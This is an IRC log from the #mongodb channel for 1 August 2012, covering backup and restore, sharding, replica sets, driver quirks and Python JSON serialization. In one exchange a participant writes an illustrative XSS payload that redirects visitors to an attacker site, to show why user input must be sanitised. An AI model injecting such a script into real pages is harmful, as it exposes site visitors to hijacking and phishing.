PMXBOT Log file Viewer


#mongodb logs for Wednesday the 1st of August, 2012

[00:23:05] <y3di> hi guys, I just ran mongodump
[00:23:27] <y3di> and I'd like to test it to make sure it's saved everything properly
[00:23:33] <y3di> how can i go about doing that
[00:30:07] <crudson> y3di: restore it to a different db
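
A minimal sketch of crudson's suggestion (the database name "mydb" and the paths are hypothetical):

    mongodump --db mydb --out /tmp/dump            # dump the source database
    mongorestore --db mydb_verify /tmp/dump/mydb   # restore into a differently named db
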
[00:35:52] <y3di> so when doing mongodump -> mongorestore all your items in the db have different _ids?
[00:36:44] <y3di> so it wouldn't make sense to make _ids user facing at all
[00:37:17] <deoxxa> where does it say that?
[00:37:28] <deoxxa> sounds like you're guessing.
[00:37:30] <deoxxa> stop guessing.
[00:37:46] <crudson> _id doesn't refer to db or collection names
[00:38:52] <y3di> deoxxa: my bad, the mongo docs said mongorestore simply reinserts the data
[00:39:13] <y3di> and since the _id is generated based off of time (among other things) i assumed the _id would change
[01:31:22] <y3di> i get this error when trying to mongorestore
[01:31:24] <y3di> Error creating index production.itemsWed Aug 1 01:30:39 User Assertion: 13111:field not found, expected type 16
[01:31:24] <y3di> assertion: 13111 field not found, expected type 16
[01:32:23] <y3di> i'm having trouble understanding what this is saying to do
[01:32:24] <y3di> http://stackoverflow.com/questions/10712600/mongodump-and-mongorestore-field-not-found
[01:56:18] <y3di> nvm i figured it out i think
[03:32:31] <arthurnn> sup. anyone in there?
[03:32:53] <arthurnn> i've got some questions about ShardKeys and queries in Shard nodes
[03:33:59] <arthurnn> i work at 500px. we started using mongodb a few months ago to store all activities from the site. now we are considering sharding this mongo instance that we have
[03:34:08] <arthurnn> but i need to know if this is the best option
[04:17:41] <jwilliams> what is the right way to do continue on error if the driver is prior to e.g. 2.8.0?
[04:42:27] <deoxxa> jwilliams: define "driver"
[05:56:10] <jwilliams> mongo java driver 2.6.5
[05:56:50] <jwilliams> which has WriteConcern, but only versions newer than 2.7.x support continue on error.
[05:57:32] <jwilliams> so i am wondering how to achieve the same effect with the earlier mongo java driver version.
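
The usual fallback when a driver lacks continueOnError is to insert one document at a time and keep going past per-document failures. A sketch of that idea, in Python for brevity (jwilliams is on the Java driver, where the same pattern applies; all names here are hypothetical):

    from pymongo import MongoClient
    from pymongo.errors import PyMongoError

    def insert_continue_on_error(collection, docs):
        # emulate continueOnError: a failed insert (e.g. a duplicate key)
        # does not stop the remaining inserts
        failed = []
        for doc in docs:
            try:
                collection.insert(doc)
            except PyMongoError:
                failed.append(doc)
        return failed

    db = MongoClient().test
    insert_continue_on_error(db.items, [{"_id": 1}, {"_id": 1}, {"_id": 2}])
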
[07:39:04] <[AD]Turbo> hola
[08:18:10] <shylent> if I create a capped collection with size cap X and create some indexes on it, does index size also get capped by X?
[08:18:18] <shylent> or is it completely independent
[08:24:23] <NodeX> there will be a max index size that won't exceed the capped collection size
[08:24:57] <NodeX> i.e. when a document gets purged from the capped collection it will be purged from the index also
[08:40:33] <shylent> Makes sense, thanks
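
For reference, shylent's scenario in a pymongo sketch (the collection name, index field, and 1 MB cap are all hypothetical):

    from pymongo import MongoClient

    db = MongoClient().test
    # size is the cap in bytes; the oldest documents are purged once it is hit
    events = db.create_collection("events", capped=True, size=1024 * 1024)
    events.ensure_index("ts")
    # as NodeX says: when a document ages out of the capped collection,
    # its index entries are removed too, so the index cannot outgrow the data
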
[10:01:25] <circlicious> the database has '0'; when i fetch it in php i get false, and true for '1' - why is that?
[10:04:11] <circlicious> some things are quite weird, i pass in false or true and mongo saves it as string '0' or '1', what's the reason?
[10:04:28] <circlicious> and when i fetch it becomes 'false' and 'true' strings
[10:05:45] <Rozza> circlicious: jump on the js shell and double check how its stored
[10:05:57] <Rozza> doesnt sound right at all
[10:10:08] <circlicious> in the js shell it shows as '0' and '1'
[10:10:19] <circlicious> "0" and "1" actually
[10:10:23] <circlicious> Rozza: ^
[10:10:49] <Rozza> ok seems that they are coming out right into php land
[10:11:17] <Rozza> if you test creating a new document in php with a boolean value is it saved as expected?
[10:11:38] <Rozza> i.e. it comes out as true / false in js?
[10:11:51] <Rozza> also are you using the latest php driver?
[10:12:12] <circlicious> wait
[10:12:31] <circlicious> 1.2.10 is the mongo driver version
[10:12:50] <circlicious> and how is it coming out right in php land? lets say if it is '0' and '1' in mongo, it comes out as 'true' and 'false' - strings
[10:14:25] <circlicious> i could be wrong actually, jQuery is sending string to server not boolean :|
[10:14:48] <circlicious> 'true' gets stored as '1' and on fetch becomes 'true' - pretty funny
[10:17:39] <NodeX> php evaluates 1 as true and zero as false
[10:17:48] <NodeX> (the ints anyway, not the strings)
[10:18:55] <Rozza> so circlicious is it a jQuery / js -> php issue ? or in php are you explicitly setting values to True / False
[10:22:34] <circlicious> wait i am checking a lot
[10:22:36] <circlicious> hold please
[10:24:46] <circlicious> ok, nvm the true false, its all my fault
[10:25:08] <circlicious> my jquery code sent '0' '1' as strings and not boolean
[10:25:14] <circlicious> and PHP stored it as it is
[10:25:29] <NodeX> always cast in PHP
[10:25:35] <circlicious> so mongo stored strings, and based on the values i tried to do boolean conditional in JS and things got messed up :/
[10:26:02] <circlicious> ye maybe i should, but i am simply storing the data that i get into DB, not messing with it at all.
[10:26:16] <circlicious> maybe i should tweak my jquery code to properly send 0 and 1 as ints not strings
[10:26:40] <circlicious> or just cast them to int in PHP when printing in HTML's JS code
[10:26:46] <NodeX> you should be sanitising and casting in your PHP
[10:26:57] <circlicious> before save?
[10:27:06] <NodeX> sanitising... it's very dangerous to let unsanitised code into any database
[10:27:33] <circlicious> what kind of sanitizing ? i thought theres no sql injection thingie in mongo, so just storing whatever the user sent was fine in my case.
[10:27:43] <NodeX> LOLOLOL
[10:27:47] <circlicious> :D
[10:27:52] <NodeX> that's the funniest thing I have ever heard
[10:27:58] <circlicious> maybe yeh :D
[10:28:00] <NodeX> what is your app called so I can avoid it
[10:28:09] <circlicious> heh :P
[10:28:18] <NodeX> XSS attacks, remote inclusion attacks
[10:28:24] <NodeX> local inclusion attacks
[10:28:25] <circlicious> basically, i am just allowing any user data for the "preferences" part of each record/document
[10:28:59] <circlicious> oh yeh, i didnt think of XSS, lol
[10:29:00] <NodeX> store <script>document.location.href='http://my.hacksite.com/exploitme.php'</script>
[10:29:20] <Guest45545> Hi guys. I have a quick question, I'm a newbie to mongo. When I use mongorestore on a set of bson files created by mongobackup where is the database restored to?
[10:29:21] <NodeX> when your site re-echoes what you saved, your users leave your site
[10:29:43] <NodeX> it's restored to the database it was dumped from
[10:29:52] <circlicious> actually
[10:29:57] <NodeX> dump/DATABASE_NAME/....
[10:30:11] <circlicious> i am dumping that data as a JS object via json_encode
[10:30:17] <Guest45545> NodeX: But I don't see any new generated files in there?
[10:30:18] <circlicious> so i thought i didnt need to care
[10:30:36] <NodeX> circlicious : that's a really bad way of not only thinking but programming in general
[10:30:41] <NodeX> bad -> dangerous
[10:30:52] <circlicious> ok, i will rewrite my code quickly then
[10:31:06] <circlicious> basically i did this
[10:31:06] <Guest45545> NodeX: But I don't see any new generated files in there?
[10:31:09] <circlicious> 'pref' => $input['pref']
[10:31:16] <Guest45545> Is there no way of regenerating the original .0, .1, .ns files?
[10:31:17] <Guest45545> whoops
[10:31:19] <circlicious> $input['pref'] is an associative array passed from the client side
[10:31:34] <NodeX> mongodump
[10:31:57] <circlicious> hm, so now maybe i should explicitly list each key/column and sanitize/int-cast? ok
[10:33:21] <NodeX> that's down to your app
[10:33:55] <circlicious> well, i'll do it anyway, not a big deal
[10:34:10] <circlicious> it'll also help me prevent issues like the one i joined for just now
[10:34:18] <circlicious> also will help me keep track of what exactly i am storing
[10:34:19] <circlicious> so fine
[10:40:27] <circlicious> ok done, things are better now NodeX
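
A minimal sketch of the whitelist-and-cast idea NodeX is pushing, shown in Python/pymongo for concreteness (the conversation is about PHP, and every field name here is hypothetical):

    from pymongo import MongoClient

    # whitelist of allowed preference keys and how to cast each value
    ALLOWED_PREFS = {
        "notify": lambda v: bool(int(v)),  # "0"/"1" strings become real booleans
        "per_page": int,
        "theme": str,
    }

    def clean_prefs(raw):
        # drop unknown keys (e.g. injected script payloads) and cast the rest
        return {k: cast(raw[k]) for k, cast in ALLOWED_PREFS.items() if k in raw}

    db = MongoClient().test
    client_input = {"notify": "1", "per_page": "25", "evil": "<script>bad()</script>"}
    db.users.insert({"pref": clean_prefs(client_input)})
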
[10:43:15] <neil__g> Some advice, if anyone has a moment: I have a P-S-S replicaset, and due to a run-away import all machines are now sitting at about 90% disk space. I've since deleted the big collection, but Mongo hasn't released the disk space. What's the safest way to free up that disk space? This is in production.
[10:43:54] <Guest45545> NodeX: can you just clarify this for me. If I run mongobackup on my database, can I use mongorestore on the bson files on another server to recreate the database?
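
For Guest45545's question: a dump taken with mongodump can be restored onto another server, and mongorestore reinserts the BSON, so the target server regenerates its own .0/.1/.ns files. A sketch with hypothetical hostnames and paths:

    mongodump --host old-server --out /backups/dump
    mongorestore --host new-server /backups/dump
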
[10:55:42] <ankakusu> I have a problem while inserting date time object into mongodb.
[10:55:46] <ankakusu> I'm using java driver.
[10:56:06] <ankakusu> the link for code is as follows:
[10:56:51] <ankakusu> http://pastebin.com/0j5CZBjH
[10:57:27] <ankakusu> after running this code, I check what is inserted into mongodb
[10:58:03] <ankakusu> the field for specific datetime object is as follows:
[10:58:04] <ankakusu> { "_id" : ObjectId("50190afae4b09264a6cbb19e"), "bla" : ISODate("2011-10-02T20:49:19Z") }
[10:58:35] <ankakusu> as it is observed, I entered "2011-10-02T23:49:19Z"
[10:58:50] <circlicious> NodeX: say if you had a field called foo in your documents, that would sometimes have a value and sometimes would not have a value, what would you do when it would not have a value?
[10:59:03] <circlicious> store foo: '' or do checking in PHP and not store anything for it ?
[10:59:22] <ankakusu> but I get "2011-10-02T20:49:19Z"
[10:59:38] <ankakusu> what is wrong about the code snippet?
[11:04:51] <NodeX> circlicious : it depends how your app wants to deal with it
[11:05:19] <circlicious> i guess if i add foo: '' that would end up consuming lots of megabytes with millions of documents
[11:05:28] <circlicious> so i'd better do the checking in php and not save it, should be fast
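
What circlicious settles on, sketched in pymongo (collection and field names are hypothetical): omit the field when it has no value, and query for its absence with $exists:

    from pymongo import MongoClient

    db = MongoClient().test

    def save_item(name, foo=None):
        doc = {"name": name}
        if foo:  # only store the field when it actually has a value
            doc["foo"] = foo
        db.items.insert(doc)

    save_item("a", foo="bar")
    save_item("b")  # no foo field stored at all
    db.items.find({"foo": {"$exists": False}})  # the documents without foo
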
[11:15:06] <pb8345> hi, does anyone have experience with oracle nosql?
[11:36:58] <NodeX> pb8345 : goto #oracle-nosql
[11:50:46] <jwilliams> is there any lock when doing mongodump?
[11:51:06] <jwilliams> i run 2 mongodumps in parallel for 2 collections
[11:51:29] <jwilliams> but it seems very slow when compared to the previous round, in which only 1 mongodump was running.
[11:51:46] <jwilliams> would it be recommended to run mongodump one at a time?
[12:12:54] <wereHamster> well, they compete for resources. So I would say yes
[12:17:25] <jwilliams> wereHamster: thanks for the explanation. that reasonably accounts for why it performs slowly.
[12:17:41] <frsk> <
[12:17:46] <frsk> uhm :)
[12:18:09] <jwilliams> stopping one process looks like it makes more progress.
[13:43:58] <addisonj> http://aws.typepad.com/aws/2012/08/fast-forward-provisioned-iops-ebs.html this is quite exciting, predictable performance from EBS? who woulda thought
[14:47:07] <NodeX> anyone know much about PCI compliance with MongoDB ?
[14:50:09] <Goopyo> http://stackoverflow.com/questions/4269086/pci-compliance-non-authenticated-db
[15:20:58] <BurtyB> Anyone know how I can prevent "PHP Fatal error: Uncaught exception 'MongoCursorException' with message 'too many attempts to update config, failing' in " I'm assuming it's because it's moving shards around?
[15:50:35] <cwebb_> i am running mongodump and its speed is very slow (4 hours for only 5% with total docs around 120mm). the previous run for another collection didn't take that long.
[15:51:29] <cwebb_> checking mongostat --discover, not many locked % (usually 0%, several times it may be around 10%).
[15:51:49] <cwebb_> iostat -x 1 shows that cpu is usually idle.
[15:52:05] <cwebb_> what other factors should i check, or where might i start?
[16:05:49] <kali> cwebb_: look for faults in mongostat rather than locks. locks are taken only on writes
[16:09:11] <cwebb_> kali: i just noticed there is a higher value (around 50~60) in the faults column. i guess that's because there is no index created (it was just for testing bulk writes, so the index will be created later)
[16:10:03] <nemothekid> Anyone here familiar with the mongodb perl driver? It doesn't seem to encode utf-8 strings properly
[16:10:04] <cwebb_> but another collection whose index was also not created did not take very long to dump around 60g of data to disk.
[16:10:41] <cwebb_> any way i can reduce the page faults? or improve this slowness issue?
[16:13:12] <kali> cwebb_: more RAM may help
[16:14:08] <cwebb_> kali: i wish i could have more ram : (
[16:14:27] <kali> is it 50/60 when mongodump is running ?
[16:15:06] <cwebb_> yes. turn off mongodump and the faults drop to 1 ~ 2.
[16:16:11] <scttnlsn> how can i atomically insert a document only if a collection is empty? is this possible with findAndModify?
[16:17:03] <addisonj> cwebb_: we had a weird issue like that, I think we ended up doing a compact and repair then all was okay
[16:18:06] <addisonj> scttnlsn: pretty sure thats a no, but I could be wrong...
[16:19:42] <cwebb_> when running compact, will it have influence e.g. performance if no indexes exist?
[16:19:46] <scttnlsn> addisonj: ok, that's what i thought. i've tried all sorts of various things with findAndModify, none of which worked like i wanted
[16:21:03] <lbjay> i'm trying to setup an init.d script for mongo on a centos system that runs using the numactl command. anyone have any examples of this on centos?
[16:21:59] <lbjay> centos doesn't have a start-stop-daemon command, just a shell function called "daemon", so the examples i'm seeing don't work for me
[18:27:55] <SisterArrow> Hiya!
[18:28:54] <SisterArrow> I have a 3-member replica set, and the primary went down, so a secondary took over and data was written to it while it was primary. When i restarted the previous primary (which should be primary as well) it stays as primary and in the mongo log it says
[18:29:04] <SisterArrow> syncTail: 11000 E11000 duplicate key error index: images.colours.$image_hash_short_1_tpx_code_1 dup key: { : "946aa1fd13", : "16-3907" }, syncing: { ts: Timestamp 1343828841000|6, h: -7441080054905885207, op: "i", ns: "images.colours", o: { _id: ObjectId
[18:29:09] <SisterArrow> it stays as secondary*
[18:29:25] <SisterArrow> Oh, and it does not sync up against the current primary.
[18:29:27] <SisterArrow> :_(
[18:29:36] <Almindor> hello
[18:29:55] <SisterArrow> Hello Almindor
[18:30:54] <Almindor> we had a repl error (disk overuse) and we want to move a replicaset to another drive (on linux). I have started re-syncing the slave, but it's not even half-done and we can already put the new drives into the machine. Is it possible to copy the data of the slave so it continues syncing from where it stopped?
[18:31:20] <Almindor> note that I will mount the new drive in a way which is transparent for mongo
[18:31:34] <kali> Almindor: i think it will start all over again
[18:32:20] <Almindor> kali: so if you start a full re-sync, stop mongod for it and restart it deletes all data and resyncs again?
[18:34:00] <kali> i think this is what it will do, yeah
[18:34:06] <kali> not 100% sure
[18:34:39] <Almindor> hmm ok i'll restart the syncing then :D
[18:49:01] <boll> The primary member of my replicaset is showing a globalLock ratio of ~4.3 and consistently has a 600+ currentQueue.writers value
[18:49:15] <boll> could that be reason why I am seeing incredibly slow reads?
[18:49:30] <boll> +the
[19:06:51] <jY> boll: yes
[19:07:52] <boll> the ratio is obviously not 4.3 though, its .43
[19:07:58] <boll> my mistake
[19:08:02] <boll> but ok
[19:08:21] <boll> it's not like I am clobbering the server though
[19:14:16] <TheSteve0> alright I am working in Python and I want to convert my results from BSON to just JSON - I have spent a couple hours searching around and trying different solutions and I can't get it to work
[19:24:45] <TkTech> TheSteve0: Uh, what?
[19:25:21] <TkTech> TheSteve0: You want to dump it to json?
[19:25:33] <TheSteve0> TkTech all my results contain the {u'_id', u'blah blah'….
[19:25:40] <TheSteve0> yeah I just want plain clean JSON
[19:25:53] <TkTech> Right…that's not going to change in JSON...
[19:25:56] <TkTech> But anyways, http://api.mongodb.org/python/2.2.1/api/bson/json_util.html
[19:27:08] <TheSteve0> TkTech: right, I saw that page,
[19:27:23] <TheSteve0> TkTech: so do I put my find query in the place of the ...
[19:27:34] <TkTech> ...what?
[19:27:38] <TkTech> Beginner to Python?
[19:28:39] <TkTech> find() just returns an iterable cursor that you must traverse, .find_one() returns a dict. json.dumps() takes a dict.
[19:29:44] <TheSteve0> TkTech: yup beginner to Python
[19:30:11] <TheSteve0> aahhh I was feeding json.dumps the list
[19:30:13] <dstorrs> I've got a harvester which pulls data from YouTube and inserts it to Mongo. When it first starts, I get excellent insert rates -- 1000+ w/s. Within a few minutes, it drops to ~700 w/s. Then 300. Then 100. Then a few dozen.
[19:30:38] <dstorrs> I've been through my code and I don't see anything to cause this...is there anything on the Mongo side that is a likely culprit?
[19:30:56] <dstorrs> It's 9 machines, each with multiple copies of the harvester proc running in parallel.
[19:31:47] <dstorrs> any ideas at all are much appreciated, because I'm kinda at wits end.
[19:32:59] <dstorrs> oh, and it's a sharded DB if that matters
[19:33:15] <TheSteve0> TkTech: well that is inconvenient - I was hoping I could just "automagically" give the list to a converter and get back nice clean JSON
[19:33:41] <TkTech> I'm confused as to why this is confusing.
[19:33:51] <TkTech> And why you keep describing it as "nice clean JSON"
[19:34:10] <dstorrs> TheSteve0: I didn't see the beginning of your convo, but you can probably do this: db.coll.find(..).forEach(function(d){ printjson(d) })
[19:34:26] <TkTech> my_json = json.dumps({'results': list(db.poopy.find())})
[19:34:36] <TkTech> dstorrs: He's in Python, not the shell.
[19:34:48] <dstorrs> ah. sorry.
[19:35:22] <TheSteve0> TkTech: the u' makes it not JSON that is usable in a client application
[19:35:45] <TheSteve0> TkTech: I didn't say it was confusing I get it - it is just inconvenient - that is all
[19:35:49] <TkTech> What
[19:35:54] <TkTech> That isn't JSON
[19:36:10] <dstorrs> TheSteve0: map your results through a cleaner function that transforms the u' into something else.
[19:36:11] <TkTech> If it has strings prefixed by u it's a unicode string in a python dict
[19:36:20] <TkTech> dstorrs: Shush, he's doing it completely wrong.
[19:36:29] <dstorrs> heh. shushing now.
[19:36:42] <TheSteve0> TkTech: I know that - TkTech let me look at your last statement and try that
[19:36:50] <TheSteve0> I understand the unicode string part
[19:37:01] <TkTech> So you were trying to use a printed python dict as JSON?
[19:37:28] <TheSteve0> TkTech here is what I am saying
[19:37:50] <TheSteve0> TkTech: the list returned from the find call is "basically" JSON
[19:37:55] <TkTech> No
[19:38:00] <TkTech> It is not, nor ever will be.
[19:38:06] <TheSteve0> TkTech: I understand it is not technically
[19:38:12] <TkTech> No, not technically nor really.
[19:38:35] <TkTech> If you want JSON, import json and turn it into JSON.
[19:39:27] <TheSteve0> TkTech: if I got rid of the u before each string, the string I get from str(list(find)) is a JSON string - especially since I have no dates in my documents
[19:40:18] <TkTech> A poor orphanage burns down every single time you say that.
[19:40:26] <TkTech> Why are you against doing this properly in two lines?
[19:40:36] <TheSteve0> TkTech: LOL
[19:40:47] <TkTech> Do not treat a python dict, which is a python dict, as g'damn JSON.
[19:40:52] <TheSteve0> TkTech: I am not - which is why I said let me go do what you said
[19:41:15] <TheSteve0> TkTech: I was laughing at your orphanage statement
[19:55:43] <nemothekid> So we have about 13 million records in a sharded collection to be updated daily in about 4 hours. We've found that the fastest way to do this is to just create a temporary table, do the inserts, then rename & drop. Sadly, you can't rename a sharded collection. Obviously our next step was to try removes and inserts, or just updates. This is _much_ slower. Are there any other options?
[20:03:51] <TheSteve0> TkTech: json.dumps({'results':list(db.parkpoints.find())})
[20:04:04] <TheSteve0> TypeError: ObjectId('501850a974af7ba846cbf74a') is not JSON serializable
[20:04:14] <TheSteve0> TkTech: thanks for your help btw
[20:04:34] <TkTech> TheSteve0: Read the very first link I gave you.
[20:04:35] <TheSteve0> TkTech: so I think this is where we go back to http://api.mongodb.org/python/2.2.1/api/bson/json_util.html
[20:04:39] <TheSteve0> yup
[20:04:41] <TheSteve0> on it
[20:06:36] <TheSteve0> TkTech: I tried import bson - but I get: NameError: name 'json_util' is not defined
[20:07:31] <TheSteve0> TkTech: sorry
[20:07:54] <TkTech> "from bson import json_util"
[20:08:19] <TheSteve0> TkTech: but doesn't "import bson" import everything
[20:08:34] <TheSteve0> import pymongo brings in all the pymongo packages
[20:08:43] <TheSteve0> TkTech: fair enough
[20:09:33] <TheSteve0> TkTech: Booya cashah - it works
[20:09:38] <TheSteve0> TkTech: thanks for your patience
[20:10:05] <TheSteve0> TkTech: any ideas on where I would put this so some other poor newb like me can find it all collected in one place
[20:10:14] <TheSteve0> TkTech: I mean in terms of doc
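
The working pattern TkTech is pointing at, collected in one place ("parkpoints" comes from TheSteve0's paste; the "test" database is an assumption):

    import json
    from pymongo import MongoClient
    from bson import json_util

    db = MongoClient().test
    # json_util.default knows how to serialize ObjectId, datetimes, etc.
    out = json.dumps({"results": list(db.parkpoints.find())},
                     default=json_util.default)
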
[20:10:36] <boll> On a not very heavily loaded sharded database, are there any obvious reasons that a backlog of 2000 or more write operations would sit in the operations queue (db.currentOp())?
[20:14:23] <EricL> Does adding a replica set to a sharded environment (i.e. the shard) distribute reads?
[20:20:02] <timoxley> http://docs.mongodb.org/manual/applications/aggregation/
[20:20:23] <timoxley> link broken due to redirects
[20:20:35] <timoxley> Derick mstearn
[20:22:08] <jgornick> Hey guys, does anyone have any insight into how I can write a map/reduce to produce a list of documents that are in a hierarchical tree structure using the child links method? I need to produce a list where I know the ID of a single document and I need to capture all of its children as well.
[20:23:37] <Derick> timoxley: hmm?
[20:23:56] <Derick> there are some issues with the website, it's being worked on
[20:24:22] <timoxley> Derick no worries. just a heads up in case everyone was at a barbeque or something
[20:24:38] <Derick> hehe, cheers
[20:26:48] <boll> In a replica set, is there a downside to allowing slave reads?
[20:26:51] <crudson> jgornick: Sounds perfectly reasonable. Do you have example input documents?
[20:27:24] <nofxx> boll, data may take some time to replicate, but it's meant to be used like that
[20:27:59] <nofxx> if you don't read from the slaves you got yourself some expensive backup machine
[20:28:21] <jgornick> crudson: I suppose you could look at the sample for child links @ http://www.mongodb.org/display/DOCS/Trees+in+MongoDB#TreesinMongoDB-ChildLinks
[20:28:58] <nofxx> boll, you can use consistency: :strong on a per-connection basis, check your driver
[20:29:04] <jgornick> crudson: Actually, I should get something more concrete to my example.
[20:29:08] <boll> nofxx: I don't read from the secondary, but it's incredibly handy for robustness and upgrades
[20:29:27] <nofxx> boll (ean) true ... hehe
[20:29:51] <crudson> jgornick: emit(parent_id, {children:[_id]}) and push the children together in reduce
[20:30:50] <boll> nofxx: It takes some work choosing which queries can live with possibly delayed replication
[20:31:01] <boll> especially in a web-ui
[20:40:09] <jgornick> crudson: That will help me get started. Thanks!
[20:40:56] <crudson> jgornick: gl. if you have issues paste some documents and what you are looking to achieve.
[20:41:11] <jgornick> crudson: Sounds good!
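
A sketch of crudson's suggestion via pymongo's map_reduce (the map and reduce bodies are JavaScript strings; collection and field names are hypothetical):

    from bson.code import Code
    from pymongo import MongoClient

    db = MongoClient().test
    mapf = Code("function () { emit(this.parent_id, {children: [this._id]}); }")
    reducef = Code(
        "function (key, values) {"
        "  var out = {children: []};"
        "  values.forEach(function (v) {"
        "    out.children = out.children.concat(v.children);"
        "  });"
        "  return out;"
        "}"
    )
    # writes one document per parent holding the ids of all its children
    db.nodes.map_reduce(mapf, reducef, out="node_children")
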
[21:07:44] <acidchild> Hello, i added a shard that contains the entire database but i added it as localhost not the IP. how do i change the shard hostname/ip without draining it? because it contains all the data and it's failing to move chunks to the other shard because it's 'localhost' not the IP?
[21:08:00] <acidchild> these are the errors i am getting; http://pastebin.slackadelic.com/p/Ze7Ox045.html
[21:11:40] <emperorcezar> So I'm using mongodb as an mq backend for celery. The program using celery is migrating email. So it's pushing messages into a queue stored on mongo and then pulling them off and pushing them somewhere else. From my understanding, mongo will just keep growing the db file until I do a repair? My mail size is 2.5 terabytes. So I'm concerned about the db becoming huge without repair.
[21:11:57] <emperorcezar> Sorry, 1.5 TB
[21:14:58] <TkTech> emperorcezar: While you can use MongoDB as a queue, it's a really bad fit for such heavy usage.
[21:15:32] <emperorcezar> TkTech: Yea. I was using it because I need to store the messageid and completion flag anyhow
[21:15:44] <emperorcezar> So I needed mongo running anyhow
[21:16:01] <emperorcezar> TkTech: I'm assuming RabbitMQ would work great for this?
[21:16:03] <TkTech> Don't be lazy :)
[21:16:18] <emperorcezar> Lazy is the mark of a good programmer. :)
[21:16:42] <TkTech> Lazy is the mark of a quick programmer who won't be around when his program no longer scales :P
[21:17:09] <TkTech> You could use just about any other backend.
[21:17:16] <TkTech> Redis being an okay candidate
[21:17:17] <emperorcezar> This thing better scale off the bat. There's no light usage. Soon as I turn it on, it's going to hammer.
[21:45:53] <nofxxx> Just to make sure I got it right: repairDB(), on new versions, will only release free space to the system, so it's not needed to run it periodically anymore
[22:13:19] <kingsol> hey all… new to mongodb (literally today) - I've followed the guide in the docs, and have searched google to find my issue to no avail. It is permission related for sure. I am on fedora. I can run "mongod" as root and it fires up. If i run "service mongod start" I get a fail, says it can't write to the log. I've found posts with similar problems… I've checked the permissions for /var/log, /var/log/mongo/ and the file itself, I've done this for
[22:13:19] <kingsol> /data/db/ as well… at a dead end as I am not a permissions wizard.
[22:15:22] <jY> kingsol: selinux enabled?
[22:16:08] <kingsol> looks...
[22:16:41] <kingsol> jY: yes, targeted
[22:16:50] <kingsol> is that the problem?
[22:16:53] <jY> for temp.. try disabling it
[22:16:56] <jY> setenforce 0
[22:17:00] <jY> then try
[22:17:43] <kingsol> cool… one sec
[22:18:35] <kingsol> already working … starting now...
[22:20:01] <kingsol> jY: so does that mean I need to permanently disable selinux? to be honest, I am not intimate with the benefits/issues of selinux other than some high level details
[22:20:36] <jY> or figure out how to tell selinux writing to those logs and binding to that port is ok for the mongo user
[22:21:47] <kingsol> is selinux a "strong benefit" or a "nice-to-have" or is it relative to function/role of the machine
[22:22:34] <jY> depends on your stance on security i guess
[22:22:55] <jY> it makes things like buffer overflows pretty much impossible
[22:23:41] <kingsol> ok… thank you so much… I'll see if I can figure out how to tell selinux to allow mongos user for those files/folders
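
One common Fedora recipe for what kingsol is about to look up: let audit2allow turn the denials in the audit log into a local policy module (the module name is hypothetical):

    setenforce 0        # temporary, to confirm selinux is the blocker (jY's test)
    grep mongod /var/log/audit/audit.log | audit2allow -M mongodlocal
    semodule -i mongodlocal.pp   # install the generated module
    setenforce 1        # re-enable enforcing mode
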
[22:24:07] <arthurnn> anyone in there. willing to help me out.
[22:24:13] <arthurnn> ?
[22:24:15] <jY> only if you ask a question
[22:24:15] <kingsol> jY: Starting mongod (via systemctl): timed out and failed (this would be the first-time start-up as the mongod user…
[22:24:52] <jY> what happens the 2nd time?
[22:25:07] <arthurnn> i had a collection .. in one mongod server only.. i added it to a shard cluster .. and I set the shard key to a property that is not unique.
[22:25:08] <kingsol> running now
[22:25:24] <arthurnn> is that wrong? or can I have a shard key on a non-unique field?
[22:25:42] <jY> kingsol: probably timed out waiting for the process to finish creating the init files
[22:26:08] <kingsol> jY: can you "extend" the timeout somehow?
[22:26:25] <jY> kingsol: no idea.. happens to me in mysql the first time.. i just ignore it
[22:29:41] <arthurnn> anyone on that.
[22:29:55] <arthurnn> because i started sharding a pre existent collection that i had.
[22:30:12] <arthurnn> and it looks like .count() is getting smaller and smaller. any reason for it?
[22:32:22] <kingsol> jY: ok, checked the logs… looks like another perm issue I can track down on google "Unable to acquire lock for lockfilepath: /var/lib/mongo/mongod.lock" checking google
[22:36:45] <arthurnn> if I do a stats() on my collection, it looks like the count in shard0000 is decreasing but the count in shard0001 is not increasing
[22:36:51] <arthurnn> any reason for that?
[22:57:45] <kingsol> jY: still won't start, fixed the locking issue by simply removing the file and letting it be created again… now it is failing because it says the port is in use
[22:57:54] <kingsol> grrr… getting closer
[23:01:54] <kingsol> jY: interesting… so it is actually starting just fine now; the service start is hanging, it seems, as though it's not getting a success message from mongod starting… if i tail -f the log and start with service mongod start &, then run mongo, I can connect. If i let it sit long enough the process for the service start terminates with a fail
[23:23:04] <kingsol> jY: I gotta run… I appreciate your help!
[23:49:27] <fabiobatalha> Hello guys!
[23:50:03] <fabiobatalha> I'm modeling a schema to store access statistics by year, month and day.
[23:50:38] <fabiobatalha> anybody have a suggestion on how to store those kind of data?
[23:51:38] <fabiobatalha> Considering that I'll use the $inc modifier, I won't be able to create complex data structures, just a flat structure.
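
A common pattern for the counters fabiobatalha describes: $inc with dot notation can target nested year/month/day keys, and an upsert creates the intermediate documents, so the structure need not stay flat. A pymongo sketch with hypothetical collection and key names:

    from datetime import datetime
    from pymongo import MongoClient

    db = MongoClient().test
    now = datetime.utcnow()
    db.stats.update(
        {"_id": "page-42"},
        {"$inc": {
            "yearly.%04d" % now.year: 1,
            "monthly.%04d-%02d" % (now.year, now.month): 1,
            "daily.%04d-%02d-%02d" % (now.year, now.month, now.day): 1,
        }},
        upsert=True,
    )
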